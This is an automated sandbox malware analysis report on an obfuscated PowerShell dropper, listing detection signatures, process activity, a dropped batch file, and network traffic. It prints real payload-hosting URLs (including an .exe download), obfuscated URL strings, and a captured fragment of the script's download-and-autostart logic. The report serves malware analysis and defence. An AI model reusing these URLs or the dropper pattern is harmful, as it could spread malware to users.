Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fs8cRx6Us2.ps1

Overview

General Information

Sample name:fs8cRx6Us2.ps1
renamed because original name is a hash value
Original sample name:f6e3224ac56171410ae0747b40a0be74bc0eab03f4200c215f60c75bcf1df84d.ps1
Analysis ID:1578219
MD5:9b4d04c52a79f4cc6c57581af89e85ac
SHA1:64b280596aa3f0a85dbfef6cccc6aed0e5b0df19
SHA256:f6e3224ac56171410ae0747b40a0be74bc0eab03f4200c215f60c75bcf1df84d
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell creates an autostart link
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6736JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_6736.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      System Summary

      barindex
      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6736, TargetFilename: C:\Users\Public\u8im.bat
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6736, TargetFilename: C:\Users\Public\u8im.bat
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", ProcessId: 6736, ProcessName: powershell.exe
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6736, TargetFilename: C:\Users\Public\u8im.bat
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1", ProcessId: 6736, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: fs8cRx6Us2.ps1Avira: detected
      Source: fs8cRx6Us2.ps1Virustotal: Detection: 28%Perma Link
      Source: fs8cRx6Us2.ps1ReversingLabs: Detection: 36%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
      Source: unknownHTTPS traffic detected: 103.120.48.75:443 -> 192.168.2.6:49708 version: TLS 1.2
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F04D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbt.Automation.pdb source: powershell.exe, 00000000.00000002.2251094455.000001CE04FC2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2251094455.000001CE04FC2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F027000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbpdbtem.pdb6 source: powershell.exe, 00000000.00000002.2272166981.000001CE1F35D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F04D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb~*c source: powershell.exe, 00000000.00000002.2272166981.000001CE1F395000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \mscorlib.pdbs' source: powershell.exe, 00000000.00000002.2271266130.000001CE1F027000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: global trafficHTTP traffic detected: GET /new/somt.exe HTTP/1.1Host: www.alramsyadvocates.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /new/somt.exe HTTP/1.1Host: www.alramsyadvocates.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.alramsyadvocates.com
      Source: global trafficDNS traffic detected: DNS query: alramsyadvocates.com
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:43:06 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE08613000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://alramsyadvocates.com
      Source: powershell.exe, 00000000.00000002.2267546136.000001CE16F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE06ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.alramsyadvocates.com
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE089EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE089EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmp, fs8cRx6Us2.ps1String found in binary or memory: http://www.blut6fmaxxlast6fr.com/rh/List%20of%20rt6fquirt6fd%20itt6fms%20and%20st6frvict6fs.pdf
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE06ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE085FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alramsyadvocates.com
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE085FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE085F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alramsyadvocates.com/new/somt.exe
      Source: powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE07B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2267546136.000001CE16F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE085D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alramsyadvocates.com
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alramsyadvocates.com/new/somt.exep
      Source: powershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.alramsyadvocatt6fs.com/nt6fw/somt.t6fxt6fp
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownHTTPS traffic detected: 103.120.48.75:443 -> 192.168.2.6:49708 version: TLS 1.2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34543E350_2_00007FFD34543E35
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345466D30_2_00007FFD345466D3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345452A50_2_00007FFD345452A5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3454283D0_2_00007FFD3454283D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3454642C0_2_00007FFD3454642C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD346134EA0_2_00007FFD346134EA
      Source: classification engineClassification label: mal80.evad.winPS1@2/5@3/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\u8im.batJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3htniar.p0j.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: fs8cRx6Us2.ps1Virustotal: Detection: 28%
      Source: fs8cRx6Us2.ps1ReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fs8cRx6Us2.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F04D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbt.Automation.pdb source: powershell.exe, 00000000.00000002.2251094455.000001CE04FC2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2251094455.000001CE04FC2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F027000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbpdbtem.pdb6 source: powershell.exe, 00000000.00000002.2272166981.000001CE1F35D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdb source: powershell.exe, 00000000.00000002.2271266130.000001CE1F04D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb~*c source: powershell.exe, 00000000.00000002.2272166981.000001CE1F395000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \mscorlib.pdbs' source: powershell.exe, 00000000.00000002.2271266130.000001CE1F027000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345400BD pushad ; iretd 0_2_00007FFD345400C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3454752B push ebx; iretd 0_2_00007FFD3454756A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34547518 push ebx; iretd 0_2_00007FFD3454756A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345409CD push E85DCA5Dh; ret 0_2_00007FFD345409F9

      Boot Survival

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.blut6fmaxxlast6fr.com/rh/List%20of%20rt6fquirt6fd%20itt6fms%20and%20st6frvict6fs.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
